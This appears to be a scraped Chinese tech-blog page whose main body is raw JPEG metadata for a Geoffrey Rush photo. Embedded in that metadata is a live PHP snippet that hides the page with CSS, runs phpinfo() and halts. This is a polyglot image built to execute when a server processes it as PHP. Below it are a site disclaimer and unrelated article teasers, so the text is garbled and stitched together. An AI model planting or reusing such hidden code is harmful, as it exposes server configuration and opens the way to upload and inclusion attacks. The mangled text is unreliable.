rdf:about=""xmlns:dc="http://purl.org/dc/elements/1.1/"><dc:format>image/jpeg</dc:format><dc:description><rdf:Alt><rdf:li xml:lang="x-default">GEOFFREY RUSH</rdf:li></rdf:Alt></dc:description><dc:creator><rdf:Seq><rdf:li>Peter Mountain</rdf:li></rdf:Seq></dc:creator><dc:rights><rdf:Alt><rdf:li xml:lang="x-default">漏 Disney Enterprises, Inc. All Rights Reserved</rdf:li></rdf:Alt></dc:rights></rdf:Description></rdf:RDF>
</x:xmpmeta>
# c.JPG
<style>body{font-size: 0;} h1{font-size: 12px !important;}</style><h1><?php echo "<hr />THIS IMAGE COULD ERASE YOUR WWW ACCOUNT, it shows you the PHP info instead...<hr />"; phpinfo(); __halt_compiler(); ?></h1>hB?}GEOFFREY RUSH<style>body{font-size: 0Canon  Canon Canon EOS-1DS ,     ,     Adobe Photoshop CS2 Macintosh 2007:05:10 10:32:05 Peter Mountain   Disney Enterprises, Inc. All Rights Reserved

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.xdnf.cn/news/315.html

如若内容造成侵权/违法违规/事实不符,请联系一条长河网进行投诉反馈,一经查实,立即删除!

相关文章

《机器人SLAM导航核心技术与实战》第1季:第10章_其他SLAM系统

视频讲解 【第1季】10.第10章_其他SLAM系统-视频讲解 【第1季】10.1.第10章_其他SLAM系统_RTABMAP算法-视频讲解 【第1季】10.2.第10章_其他SLAM系统_VINS算法-视频讲解 【第1季】10.3.第10章_其他SLAM系统_机器学习与SLAM-视频讲解 第1季&#xff1a;第10章_其他SLAM系统 …

JDK8---Stream流详解

Stream流 一.概述二.数据准备二.Stream流的创建2.1 单列集合创建Stream流.2.2 数组创建Stream流2.3 双列集合创建Stream流 三. 中间操作.3.1 filter(过滤操作)3.2 map(计算或者转换)3.3 distinct(去重操作)3.4 sorted(排序操作)3.5 limit (设置流的长度)3.6 skip(跳过前n个元素…

tcp shutdown, fin_wait1, fin_wait2, close_wait, last_ack, 谢特!

TCP 作为双向传输协议&#xff0c;如果你想只收不发&#xff0c;可以单向关掉发&#xff0c;shutdown(socket.SHUT_WR)&#xff0c;但不建议这么做。 看以下代码&#xff1a; #!/Users/zhaoya/myenv/bin/python3 # client import socketclient_socket socket.socket(socket.…

算法详解——线段树

1. 线段树介绍 线段树是一个高度平衡二叉树&#xff0c;它主要用来高效动态地管理一个序列。线段树叶子结点存储序列元素值&#xff0c;分支结点存储一个连续地子区间的某种聚合信息&#xff0c;例如最值、均值等信息。 如图所示&#xff1a; 用这样一个树状结构来管理序列…

XXL-JOB

Github 地址&#xff1a; https://github.com/xuxueli/xxl-job/ 。 官⽅介绍&#xff1a; https://www.xuxueli.com/xxl-job/ 。 XXL-JOB 于 2015 年开源&#xff0c;是⼀款优秀的轻量级分布式任务调度框架&#xff0c;⽀持任务可视化管理、弹性 扩容缩容、任务失败重试和告…

基于 Python 的 Django 框架开发的电影推荐系统

项目简介&#xff1a;本项目是基于 Python 的 Django 框架开发的电影推荐系统&#xff0c;主要功能包括&#xff1a; 电影信息爬取&#xff1a;获取并更新电影数据。数据展示&#xff1a;提供电影数据的列表展示。推荐系统&#xff1a;基于协同过滤算法实现个性化推荐。用户系…

服务器的免密登录和文件传输

在天文学研究中&#xff0c;通常会采用ssh登录服务器&#xff0c;把复杂的计算交给服务器&#xff0c;但是如果你没有进行额外的配置&#xff0c;那么登录服务器&#xff0c;以及和服务器进行文件传输&#xff0c;每次都要输入账号和密码&#xff0c;比较不方便&#xff0c;Win…

interrupt、interrupted、isInterrupted方法详解

interrupt方法的源码&#xff1a; public void interrupt() {if (this ! Thread.currentThread())checkAccess();synchronized (blockerLock) {Interruptible b blocker;if (b ! null) {interrupt0(); //仅仅对当前线程的中断位进行标记b.interrupt();return;}}interrupt0()…

yarn 下载安装、下载依赖、通过 vscode 运行服务(Windows11)

目录 yarn工具前置要求&#xff1a;安装node.js并配置好国内镜像源下载安装下载依赖特别的&#xff1a; 启动服务 yarn 工具 系统&#xff1a;Windows 11 前置要求&#xff1a;安装node.js并配置好国内镜像源 参考&#xff1a;本人写的《node.js下载、安装、设置国内镜像源…

JDK8 Kylin jdk-8u341-linux-x64.tar.gz

JDK8 Kylin jdk-8u341-linux-x64.tar.gz chmod 777 jdk-8u341-linux-x64.tar.gz tar -zxvf jdk-8u341-linux-x64.tar.gz chmod 777 -R jdk1.8.0_341 vi /etc/profile ESC :wq source /etc/profile java -version eclipse JRE tomcat

ssm基于vue框架和elementui组件的手机官网+vue

系统包含&#xff1a;源码论文 所用技术&#xff1a;SpringBootVueSSMMybatisMysql 免费提供给大家参考或者学习&#xff0c;获取源码请私聊我 需要定制请私聊 目 录 目 录 III 1 绪论 1 1.1 研究背景 1 1.2 目的和意义 1 1.3 论文结构安排 2 2 相关技术 3 2.1 SSM框…

如何封装一个可取消的 HTTP 请求?

前言 你可能会好奇什么样的场景会需要取消 HTTP 请求呢&#xff1f; 确实在实际的项目开发中&#xff0c;可能会很少有这样的需求&#xff0c;但是不代表没有&#xff0c;比如&#xff1a; 假如要实现上述这个公告栏&#xff0c;每点击一个 tab 按钮就会切换展示容器容器中…

关于武汉芯景科技有限公司的马达驱动芯片AT6237开发指南(兼容DRV8837)

一、芯片引脚介绍 1.芯片引脚 二、系统结构图 三、功能描述 逻辑功能

sqlserver、达梦、mysql调用存储过程(带输入输出参数)

1、sqlserver&#xff0c;可以省略输出参数 --sqlserver调用存储过程&#xff0c;有输入参数&#xff0c;有输出参数--省略输出参数 exec proc_GetReportPrintData 1, , , 1--输出参数为 null exec proc_GetReportPrintData 1, , , 1, null--固定输出参数 exec proc_GetReport…

leetcode 1470.重新排列数组

1.题目要求: 2.题目代码: class Solution { public:vector<int> shuffle(vector<int>& nums, int n) {vector<int> x_array(nums.begin(),nums.begin() n);vector<int> y_array(nums.begin() n,nums.end());int x_index 0;int y_index 0;for…

各地级市能源消耗量数据-基于灯光数据的反演(2000-2022年)

今天带来的数据是的全国各省市能源消耗量数据&#xff0c;省级的能源消耗量数据可以在统计年鉴之中查到&#xff0c;但市级的数据却暂无统计。但今天我们基于一篇论文提供的思路&#xff0c;通过夜间灯光与省级能源消耗量对更小尺度的地区能源消耗量进行反算。原文提供1995-200…

微服务设计模式 - 重试模式(Retry Pattern)

微服务设计模式 - 重试模式&#xff08;Retry Pattern&#xff09; 定义 重试模式&#xff08;Retry Pattern&#xff09;是一种微服务中的设计模式&#xff0c;用于在临时性失败&#xff08;如网络故障或暂时不可用的服务&#xff09;发生时&#xff0c;自动重新尝试请求&…

从源码到成品应用:互联网医院系统与在线问诊APP的开发全解析

今天将全面解析互联网医院系统和在线问诊APP的开发过程&#xff0c;从源码到成品应用&#xff0c;帮助您理解其中的关键技术和实施策略。 一、系统架构设计 互联网医院系统和在线问诊APP的开发首先需要一个合理的系统架构。通常&#xff0c;系统架构分为前端和后端两个部分。…

简记 Vue3(一)—— setup、ref、reactive、toRefs、toRef

个人简介 &#x1f440;个人主页&#xff1a; 前端杂货铺 &#x1f64b;‍♂️学习方向&#xff1a; 主攻前端方向&#xff0c;正逐渐往全干发展 &#x1f4c3;个人状态&#xff1a; 研发工程师&#xff0c;现效力于中国工业软件事业 &#x1f680;人生格言&#xff1a; 积跬步…

ZooKeeper 客户端API操作

文章目录 一、节点信息1、创建节点2、获取子节点并监听节点变化3、判断节点是否存在4、客户端向服务端写入数据写入请求直接发给 Leader 节点写入请求直接发给 follow 节点 二、服务器动态上下线监听1、监听过程2、代码 三、分布式锁1、什么是分布式锁?2、Curator 框架实现分布…